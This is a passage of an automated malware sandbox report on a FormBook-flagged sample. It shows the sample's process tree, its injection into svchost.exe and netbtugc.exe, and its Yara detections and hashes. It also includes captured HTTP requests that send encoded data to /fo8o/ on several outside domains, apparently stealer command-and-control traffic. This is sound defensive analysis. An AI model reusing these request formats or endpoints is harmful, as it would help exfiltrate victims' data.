7Fp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWanNn8XDkTvzd/Ie2nB6tzQLWKakrdGG4xUscrKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fJ/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZzjLiViX0Lp0PW7XSxY1U4YA0Z66PFyBxtpQZSgNQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9tmqAVpMvkSRvUArVW2NVpnzKjcgTxL/DBRlNImMIR+PT5MHwmfjWkAmxFlylFlMITMd+IC5dMlVPpWwjCXq6MxTzordJMtM1S1atxylHNpC89wJPHHxA9/jk7BKjsoqhGy4hKY8gkVPa1Ry5hCKTNTo+Xfaggk4FqKXyjMXh4fZVmCfquVLKjKRiBHwaZOxv0pDRDEf5j4BsSFLNuegAfHZvNRJYWtd1iAQps3/1f3xqnul7yzHiVU2nJS13+cGfoe2A2H00Sip0z1K9LdNlXmYO1jJU4ywKdoo11/tgbCyh0BgPpMSRuNM7E6Rpt7UFs3/HUWJmJod0nnNHkIzP/Fo89HepAVZoKf5aICTQVNh3QuDpSObeygXbf8T7f0Ps3ZoPHkkJHq+hqVH73iQJi2v5PaVm9Ke5X+glmDm7rRrGUx5VUCzLfT2bPu0IOI3LPFquQrbyY2ceLAvqUtFB3s8dGp47rYLDA6r+vaPyeS3NN26l72FAcAKCO8B08iGExuVedxcwb2Yw9L7UQ [TRUNCATED]
Jan 11, 2025 04:09:05.386902094 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 11 Jan 2025 03:09:05 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49734	217.196.55.202	80	2040	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:09:07.404661894 CET	519	OUT	GET /fo8o/?7Fp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:09:07.959443092 CET	1236	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Sat, 11 Jan 2025 03:09:07 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?7Fp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&HN4=EPU0u4nHA platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.8	49735	154.215.72.110	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:09:49.560178995 CET	516	OUT	GET /fo8o/?7Fp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==&HN4=EPU0u4nHA HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 11, 2025 04:09:50.449210882 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 03:09:50 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.8	49736	116.50.37.244	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:10:03.527343035 CET	799	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 204 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 66 2b 69 68 4b 4e 35 6b 56 6a 42 53 54 58 45 45 48 35 7a 4f 77 6e 61 50 46 49 62 45 35 61 50 52 57 73 55 6b 58 34 3d Data Ascii: 7Fp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOf+ihKN5kVjBSTXEEH5zOwnaPFIbE5aPRWsUkX4=
Jan 11, 2025 04:10:04.416059971 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 11 Jan 2025 03:10:03 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.8	49737	116.50.37.244	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 04:10:06.057199001 CET	819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 224 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 37 46 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 50 78 50 47 67 74 42 4f 48 6e 4c 31 38 6b 36 41 73 61 6f 55 78 39 79 59 4e 2b 77 4c 4a 73 72 55 72 4f 70 64 44 34 Data Ascii: 7Fp=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwPxPGgtBOHnL18k6AsaoUx9yYN+wLJsrUrOpdD4
Jan 11, 2025 04:10:06.931744099 CET	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 11 Jan 2025 03:10:06 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Target ID:	0
Start time:	22:05:25
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\WBI835q8qr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WBI835q8qr.exe"
Imagebase:	0xb20000
File size:	1'195'008 bytes
MD5 hash:	EB30426F7E258E040ADA0DAFDFABAEF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:05:25
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WBI835q8qr.exe"
Imagebase:	0x8b0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1567281464.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1568187338.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1567707213.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:05:34
Start date:	10/01/2025
Path:	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe"
Imagebase:	0x3b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3855901361.0000000003240000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	22:05:35
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x7ff6ee680000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3856343827.0000000003090000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3848509513.0000000000CA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3856117631.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:05:48
Start date:	10/01/2025
Path:	C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\aTzvTjcSHrGMUlCOkcuoMBPVvpngYZRvDGKMPXTsVPmJVzgYjZfcNlnsHwpmQtIsQobLEBfDMutGiHwJ\zERAQEwgaCWL.exe"
Imagebase:	0x3b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3859655082.0000000004E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	22:06:00
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	7.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	154

Executed Functions

Function 00B23B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B23B68
IsDebuggerPresent.KERNEL32 ref: 00B23B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00BE52F8,00BE52E0,?,?), ref: 00B23BEB

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

Part of subcall function 00B3092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B23C14,00BE52F8,?,?,?), ref: 00B3096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00B23C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00BD7770,00000010), ref: 00B5D281
SetCurrentDirectoryW.KERNEL32(?,00BE52F8,?,?,?), ref: 00B5D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BD4260,00BE52F8,?,?,?), ref: 00B5D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00B5D346

Part of subcall function 00B23A46: GetSysColorBrush.USER32(0000000F), ref: 00B23A50
Part of subcall function 00B23A46: LoadCursorW.USER32(00000000,00007F00), ref: 00B23A5F
Part of subcall function 00B23A46: LoadIconW.USER32(00000063), ref: 00B23A76
Part of subcall function 00B23A46: LoadIconW.USER32(000000A4), ref: 00B23A88
Part of subcall function 00B23A46: LoadIconW.USER32(000000A2), ref: 00B23A9A
Part of subcall function 00B23A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B23AC0
Part of subcall function 00B23A46: RegisterClassExW.USER32(?), ref: 00B23B16

Part of subcall function 00B239D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B23A03
Part of subcall function 00B239D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B23A24
Part of subcall function 00B239D5: ShowWindow.USER32(00000000,?,?), ref: 00B23A38
Part of subcall function 00B239D5: ShowWindow.USER32(00000000,?,?), ref: 00B23A41

Part of subcall function 00B2434A: _memset.LIBCMT ref: 00B24370
Part of subcall function 00B2434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B24415

Strings

runas, xrefs: 00B5D33A
This is a third-party compiled AutoIt script., xrefs: 00B5D279

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

